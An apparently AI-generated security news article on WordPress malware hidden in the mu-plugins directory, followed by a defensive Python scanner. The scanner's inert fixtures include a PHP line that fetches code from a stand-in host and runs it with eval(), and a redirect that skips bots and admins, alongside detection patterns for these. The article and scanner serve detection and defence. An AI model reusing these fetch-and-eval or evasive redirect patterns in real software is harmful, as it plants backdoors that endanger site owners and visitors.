Ethical Hacking News
Sucuri researchers have documented WordPress malware that hides in the mu-plugins directory, a location attackers favour for persistence because files placed there load automatically on every request and never show up in the standard plugin list. This is post-compromise tradecraft rather than a vulnerability in the directory itself: the attacker already needs write access to wp-content. The third sample in the report is a JavaScript injector that replaces site images with explicit content and hijacks links to open malicious popups, and together with the other two it shows how the directory is used to stay resident and manipulate site traffic.
All three samples rely on obfuscated PHP and eval() to run arbitrary code. The other two are a fake update redirect (redirect.php), which sends selected visitors to a malicious site and tricks them into running malicious code, leading to data theft and further infections, and a remote code execution webshell (index.php), which fetches and executes a remote PHP script so the attacker keeps persistent control and can push new payloads at will.
The findings underline the need for regular monitoring, file integrity checks, and web application firewalls, and show how much effort attackers put into burying malware deep inside WordPress installations where routine plugin review will not find it.
Sucuri has uncovered an evasive malware campaign that targets WordPress sites by abusing the mu-plugins directory. The vector is noteworthy because files there bypass the checks many administrators and scanners apply to ordinary plugins, so malicious code can be planted quietly and is harder to detect and remove.
The third sample in Sucuri's report is a JavaScript injector in custom-js-loader.php that replaces site images with explicit content and hijacks links to open malicious popups. Because every top-level PHP file in the mu-plugins folder is executed on each request, the injector runs without ever being activated, damaging the site's reputation and user experience while steering traffic to the attacker. It illustrates why the directory is an ideal home for backdoors that execute arbitrary code unnoticed.
In February, Sucuri warned of threat actors abusing WordPress mu-plugins, which auto-load without activation, to maintain persistence and evade detection by hiding backdoors in the mu-plugins directory. The firm noted that, unlike regular plugins, must-use plugins are loaded automatically on every page request, need no activation, and do not appear in the standard plugin list, which makes the location attractive to anyone seeking persistence and low visibility.
In that campaign the attackers used obfuscated PHP in mu-plugins to execute a hidden payload stored at /wp-content/uploads/2024/12/index.txt, passing it to eval() to run arbitrary code. The loader constructs a URL, sends requests to an external server, fetches content with file_get_contents() or cURL, modifies robots.txt, checks the response for expected markers, and pings sitemaps. Together these steps let the attackers alter site behaviour, evade detection, and drive redirections, and the uploads directory is a natural hiding place because it is writable by design and routinely excluded from PHP-focused scans.
Sucuri researchers have identified two further cases of malware in the mu-plugins directory, each using a different method to compromise WordPress sites. The first is a fake update redirect (redirect.php) that selectively sends visitors to a malicious site while skipping bots and logged-in administrators, so that crawlers and site owners never see the redirect. Disguised as an ordinary WordPress function, it tricks users into executing malicious code, leading to data theft, additional backdoors, and further infections.
The second is a remote code execution webshell. The file, index.php, poses as a plugin and uses cURL to fetch a remote PHP script and execute it. Because the payload lives on the attacker's server, new malware can be swapped in at any time without modifying the file on disk, which defeats naive change detection and gives the attacker persistent control.
Several signs point to this kind of infection. The most visible is unusual site behaviour, such as visitors being redirected to external malicious websites while administrators see nothing wrong. Suspicious files with uncommon or misleading names appear in the mu-plugins directory, often mimicking legitimate plugins; since that directory is usually empty or holds a handful of known files, any unfamiliar entry deserves review. Administrators may also notice elevated server resource usage with no clear explanation, unexpected file modifications, or unauthorised code in critical directories such as wp-content/uploads.
The growing use of the mu-plugins directory underscores how creative and persistent attackers are in hiding malware deep within WordPress installations. Regular security monitoring, file integrity checks against a known-good baseline, and web application firewalls (WAFs) are essential, with the caveat that a WAF inspects requests and will not remove PHP that is already resident on disk. As Sucuri highlights, administrators must remain vigilant and adopt proactive measures rather than waiting for visible symptoms.
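The following is an added example, not Sucuri's tooling or anything from the original report. It shows the two checks the article recommends applied to the mu-plugins directory: an indicator scan for the constructs described above (eval(), cURL or file_get_contents() fetches, decode layers, bot and admin gating, client-side script injection, robots.txt and sitemap tampering) and a file integrity comparison against a baseline manifest. The rule set, the verdict thresholds, the manifest format and the sample plugin contents are all constructed for illustration; the samples only mimic the shape of the described files and contain no working payload.

```python
"""Scan a WordPress mu-plugins directory for the loader and backdoor patterns
described in the article and verify files against a baseline manifest.

Added example for this page, not Sucuri's tooling. The rule strings, verdict
thresholds, manifest format and sample files are constructed (assumptions).
"""
import hashlib
import os
import re
import tempfile

# WordPress executes every top-level *.php file in wp-content/mu-plugins on each
# request; files in subdirectories run only if a top-level file includes them,
# so the scan is limited to the top level, which is also where persistence lives.
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\("),
    "dynamic_fetch": re.compile(r"\b(file_get_contents|curl_exec)\s*\(", re.I),
    "decode_layer": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
    "bot_or_admin_gate": re.compile(r"(HTTP_USER_AGENT|is_admin\(|current_user_can\()"),
    "client_side_inject": re.compile(r"(<script|document\.querySelectorAll|window\.open)"),
    "external_url": re.compile(r"https?://"),
    "robots_sitemap": re.compile(r"(robots\.txt|sitemap)", re.I),
}


def find_indicators(src):
    """Return the sorted list of rule names that match a PHP source string."""
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(src))


def sha256(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def scan_mu_plugins(mu_dir, baseline):
    """Return {filename: {"hits": [...], "integrity": status}} for top-level PHP files.

    baseline maps filename -> expected sha256 for files the site owner put there.
    """
    report = {}
    for name in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, name)
        if not name.endswith(".php") or not os.path.isfile(path):
            continue
        if name not in baseline:
            status = "unexpected"          # nobody recorded adding this file
        elif baseline[name] != sha256(path):
            status = "modified"            # known file, content changed
        else:
            status = "ok"
        with open(path, encoding="utf-8", errors="replace") as fh:
            report[name] = {"hits": find_indicators(fh.read()), "integrity": status}
    for name in baseline:                  # baseline files that disappeared
        report.setdefault(name, {"hits": [], "integrity": "missing"})
    return report


def verdict(entry):
    """Thresholds are an assumption: eval plus a fetch or decode layer is
    treated as malicious; an unknown/changed file with two or more weak
    signals is suspicious; any other integrity deviation still needs review."""
    hits = set(entry["hits"])
    if "eval" in hits and hits & {"dynamic_fetch", "decode_layer"}:
        return "malicious"
    if entry["integrity"] != "ok" and len(hits) >= 2:
        return "suspicious"
    if entry["integrity"] != "ok":
        return "review"
    return "clean"


# Constructed fixtures: inert stand-ins for the files the article describes.
SAMPLES = {
    # legitimate site customisation that the owner recorded in the baseline
    "site-tweaks.php": "<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n",
    # shape of the fake update redirect: skips bots and admins, then redirects
    "redirect.php": (
        "<?php\nif (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') === false && !is_admin()) {\n"
        "  header('Location: https://example.invalid/update'); exit;\n}\n"
    ),
    # shape of the webshell: fetch remote PHP with cURL and eval() it
    "index.php": "<?php\n$ch = curl_init('https://example.invalid/p.txt');\n$c = curl_exec($ch);\neval($c);\n",
    # shape of the JS injector: decoded script printed into every page footer
    "custom-js-loader.php": (
        "<?php\n$js = base64_decode('Li4u');\n"
        "add_action('wp_footer', function () use ($js) { echo \"<script>$js</script>\"; });\n"
    ),
}


def demo():
    """Write the fixtures to a temporary mu-plugins dir and return {file: verdict}."""
    with tempfile.TemporaryDirectory() as mu_dir:
        for name, body in SAMPLES.items():
            with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        baseline = {
            "site-tweaks.php": sha256(os.path.join(mu_dir, "site-tweaks.php")),
            "maintenance.php": "0" * 64,   # recorded earlier, now gone from disk
        }
        return {name: verdict(e) for name, e in scan_mu_plugins(mu_dir, baseline).items()}


if __name__ == "__main__":
    for name, v in demo().items():
        print(f"{v:10} {name}")
```

In production the baseline would be generated once from a clean install (for example right after deployment) and stored outside the web root, and the scan scheduled alongside a check of wp-content/uploads for .txt or image files that contain <?php, since the February loader kept its payload there rather than in the plugin file itself.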
Related Information:
https://www.ethicalhackingnews.com/articles/Hiding-in-Plain-Sight-The-Sophisticated-Malware-Tactics-Targeting-WordPress-Sites-through-Mu-Plugins-ehn.shtml
https://securityaffairs.com/176083/malware/wordpress-malware-in-the-mu-plugins-directory.html
Published: Tue Apr 1 03:44:59 2025 by llama3.2 3B Q4_K_M